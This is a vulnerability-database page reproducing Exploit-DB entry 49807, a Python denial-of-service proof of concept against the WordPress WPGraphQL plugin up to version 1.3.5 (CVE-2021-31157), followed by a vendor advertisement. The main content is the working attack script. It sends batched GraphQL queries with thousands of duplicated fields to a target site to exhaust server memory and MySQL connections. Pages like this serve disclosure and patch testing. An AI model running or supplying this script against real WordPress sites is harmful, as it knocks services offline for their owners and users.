WordPress GraphQL 1.3.5 Denial of Service attack using field duplication and batched queries to cause server OOM and MySQL connection error
Reporter | Title | Published | Views | Family All 3 |
---|---|---|---|---|
![]() | WordPress WPGraphQL plugin <= 1.3.5 - Denial of Service vulnerability | 12 Apr 202100:00 | – | patchstack |
![]() | CVE-2021-31157 | 20 Apr 202219:48 | – | cve |
![]() | WPGraphQL < 1.3.6 - Denial of Service | 27 Apr 202100:00 | – | wpvulndb |
Source | Link |
---|---|
vulners | www.vulners.com/exploitdb/EDB-ID:49807 |
"""
This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.
"""
import sys
import requests
def usage():
print('* WordPress GraphQL 1.3.5 Denial of Service *')
print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0]))
print('python {} http://site.com 10000 100'.format(sys.argv[0]))
sys.exit(1)
if len(sys.argv) < 4:
print('Missing arguments!')
usage()
def wpgql_exists():
try:
r = requests.post(WORDPRESS_URL, json='x')
if 'GraphQL' in r.json()['errors'][0]['message']:
return True
except:
pass
return False
# This PoC assumes graphql is located at index.php?graphql
WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'
FORCE_MULTIPLIER = int(sys.argv[2])
CHAINED_REQUESTS = int(sys.argv[3])
if wpgql_exists is False:
print('Could not identify GraphQL running at "/index.php?graphql"')
sys.exit(1)
queries = []
payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER
query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}
for _ in range(0, CHAINED_REQUESTS):
queries.append(query)
r = requests.post(WORDPRESS_URL, json=queries)
print('Time took: {} seconds '.format(r.elapsed.total_seconds()))
print('Response:', r.json())
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo